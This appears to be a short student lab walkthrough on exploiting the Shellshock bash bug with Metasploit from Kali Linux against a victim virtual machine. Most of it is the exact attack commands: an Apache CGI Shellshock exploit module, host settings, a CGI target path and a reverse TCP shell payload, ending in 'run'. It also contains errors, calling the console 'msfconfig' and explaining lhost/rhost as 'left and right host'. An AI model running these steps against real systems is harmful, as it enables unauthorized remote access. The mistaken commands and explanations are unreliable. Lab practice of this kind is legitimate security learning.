Shellshock is a type of security bug that allows an attacker to execute arbitrary commands in terminal to gain unauthorized access to victim’s device. Known vulnerabilities are usually assigned with an identifier, when security experts are developing a patch.
Metasploit provides information about security vulnerabilities that can be executed into the system and it is mainly used for penetration testing for software and operating system.
The Kali Linux IP address are 10.0.2.15 and the victim IP address are 10.0.2.5 connected via NAT bridge, both are run in different virtual machines.
First, run the Metasploit framework in Kali Linux by typing “msfconfig” in its command line.
Type in “search shellshock” to see what types of shellshocks that can be used by typing in the following commands provided.
As an example, we want the attacker to gain access to victim, so we type in these following command, it is available on the list of search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Then we want to set the left and right host, where left is the Kali Linux IP address and right is the victim IP address. Type in these following commands:
set lhost 10.0.2.15
set rhost 10.0.2.5
Once the left and right host has been successfully assigned, type in these commands where it assigns the path of vulnerability and set one of the type of payload:
set targeturi /cgi-bin/status/
set payload linux/x86/shell/reverse_tcp
To see what types of payload that can be used, simple type in “show payloads”
Finally, use “check” to make sure that the exploit can be exploited to this system and “run” to enable the exploit. One of the exploit are that the attacker gain access to the victim as their own name and its IP address.
We can see that the image above shows the victim’s name and IP address, thus exploit run successfully.
Ryan Anggada 